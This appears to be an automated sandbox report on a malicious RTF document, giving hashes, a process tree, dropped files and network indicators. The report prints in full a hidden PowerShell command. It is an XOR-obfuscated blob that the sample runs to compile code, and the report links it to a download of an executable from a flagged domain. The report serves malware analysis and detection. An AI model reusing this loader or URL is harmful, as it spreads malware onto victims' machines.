File name: | Slip Copy1.doc |
Full analysis: | https://app.any.run/tasks/c9ea7425-d697-4a9a-ae98-62598d0cb74b |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 08:29:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 0A9FBBA5354A54BD3DC37A3B3BDEFE5B |
SHA1: | 82AF4E5E82BD1E00E0698B4F892501C4742F06EF |
SHA256: | 0533268227076B87067688131C7B790800B7B4A7337C4D058F7EB622A714D976 |
SSDEEP: | 1536:oZdMkutGeCOZQmd1EUsgBAnEppBS1DMO8tdsDko0wzKN3hrDvNpk2LJHnxS:oHMLwzQjtxS |
Extension | Identified type |
---|---|
.rtf | Rich Text Format (100) |

Property | Value |
---|---|
InternalVersionNumber: | 57435 |
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3688 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Slip Copy1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1472 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
1844 | powershell -WindowStyle Hidden function u91f2b8 { param($o41561) $gbda36 = 'cefe2';$e85339 = ''; for ($i = 0; $i -lt $o41561.length; $i+=2) { $n6c97 = [convert]::ToByte($o41561.Substring($i, 2), 16); $e85339 += [char]($n6c97 -bxor $gbda36[($i / 2) % $gbda36.length]); } return $e85339; } $r145cd3 = '16160f0b5543361f164606085d10410a0b0145611a1612005f4d37130b460a08034b7b0d1103175d13360317440a0603160916160f0b5543361f1646060848215b0202080a41170c05160916160f0b5543361f16460608482c7d5810150c5c0445351c4117000b4b7c06115d6838131004095b00450509531016461d0a0504041e6927090a2c5f130a14111a410e03175c06095557104f200811401a35090c5c17584422571735140a5122010217571016444c6f431513075e0a0646164602110f0612061d1200400d452f0b463311144550520654541a2a0b1235461145125d04565755571e1011140c5c0445175d000154035c1b583e22095e2a08160a40174d440e57110b03090151474a45770d11141c620c0c0811125e4544295d02012a0c501104141c104a3846154701090f0612101107115b0045031d46061708457b0d11361140431150000054544e1646110c0802120157515c0b004c5d3e760f092f08420c17124d100800140b570f5654471e43200811401a35090c5c175844335b111113045e33170911570011444c6f431513075e0a0646164602110f0612061d1200400d45040a5d0f45135c0401515f4d7b0d1136114043095e505654060549672a0b12354611451307545b5602071e43100f0b4643175453065449460a471745130c5c174510545001075f4c0938210a097b0e150917464b472d00400d000a56004d010a09104f45230b46111c360a5b0d115b476017092b0a44062803085d111c444912300012295310112317400c175b03530f16034c6f43161204460a0646004a1700140b12150a0f011214565f5701014d2f0b463311144541515353570b55492f0b463311144544575351061e0a0b12455d020300521b581513075e0a0646164602110f06120a0b12454007005456564b4c1d2c5c17351217120151575c064358461104065751541a165c570300015d4e470251555e5407530657060254555f5553414c4f5e5b054d0451035a515b587b0d113611404d3f03175d4a1e010a460c4504030300005d187b0d113611404311045400565804545151544e0706525c5249475a540057505b4d445700535d57500200535755025351565d005451515507535656560354474f4c090a034e1150525753580f2a0b123546114b3c00400c4c1d025d170a460754520
6035e4f362c0811621717460905520154560b5e4d332c5c173512171b565e130c5c174509060701065b55090a034e44475a5304510b4b1104540056490a52030757555c1e531d52551e0c1012455d005004061b4a1e010a460c4504030300005d18701a11033e6f431100030755581d554a50544a554a05034a554a5a551b5e7b0d11361140430652515601582b0440100d07091c22090a0a512b220a0a5002094e561b58280717410b040a4b710c151f4d46050353531e534905510607074a561b5812555c0050074e0b5714452f0b463311144d46015454501c370a2f0b4655514e4c19531d565503014c4a060657010449014a5e04030300005c4565060725095b060b1245430757055d07575808004543320307710f0c030b464b4c5d1646110c08021204535e04000058230b440a17090b5f060b124b750611200a5e0700143553170d4e205c150c140a5c0e0008111c301503065b0209200a5e0700144b7313150a0c5102110f0a5c270412041b48473a39440254025105414e135c030557045d1a415102550252005655104a5e170100005d53511c270a110b5e0c0402235b0f004e100b520354070a4b475607035254545407535d52060602540555025652575202535553555656555753035555005550565257550355515e550456015600060255075553565c5604060254545502560357560602555354045754520602075454550a560052060355555555025206565303075555471b4f02505d5351064f5e62110a0500411036120440172c08035d431707070107580800454335140a5106161536460217122c5c050a4e02045b0454061b5835140a510616154b61170414111a11040456564a5e140046161708450258181610500f0c0545411704120c51431612175b0d0246100b520354070a4b1612175b0d02460305565d5f521b181612175b0d0246110a55505456005e470500540657445e4117170f0b55431150000054545b3646110c08021c260816114b580309171a0a0b12455b5e555d0c0e0552535d0b544b2a005c04110e5e5b4858544c49011c12001201540557035e26090b440617124b660c271f11574b0351500a5a52483647011612175b0d024e0c1e514c4a54044a5e1253575152574e0f4b060e04404a4d0454515154463b12175d50500050573d4d5b4c574f451743115e53075156544b7e060b01115a3e4c5d1840061113175c431150000054545d184f'; $r145cd32 = u91f2b8($r145cd3); Add-Type -TypeDefinition $r145cd32; [x8fab]::rde23d(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
608 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3112 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\gur05efd.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3820 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES339.tmp" "c:\Users\admin\AppData\Local\Temp\CSC338.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF06B.tmp.cvr | — | — | — |
1472 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRF86A.tmp.cvr | — | — | — |
1844 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K7TQUTJUJ2WQN86T9KPZ.temp | — | — | — |
608 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVRFFEC.tmp.cvr | — | — | — |
608 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DF5C41FAC45B6DA6F3.TMP | — | — | — |
3688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF2084925E4A3491B1.TMP | — | — | — |
3112 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC338.tmp | — | — | — |
3112 | csc.exe | C:\Users\admin\AppData\Local\Temp\gur05efd.pdb | — | — | — |
3820 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES339.tmp | — | — | — |
3112 | csc.exe | C:\Users\admin\AppData\Local\Temp\gur05efd.dll | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1844 | powershell.exe | GET | 301 | 198.136.51.245:80 | http://zeetechbusiness.com/loki/temp/css/html/see.exe | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1844 | powershell.exe | 198.136.51.245:80 | zeetechbusiness.com | HostDime.com, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
zeetechbusiness.com | | malicious |
www.zeetechbusiness.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
1844 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |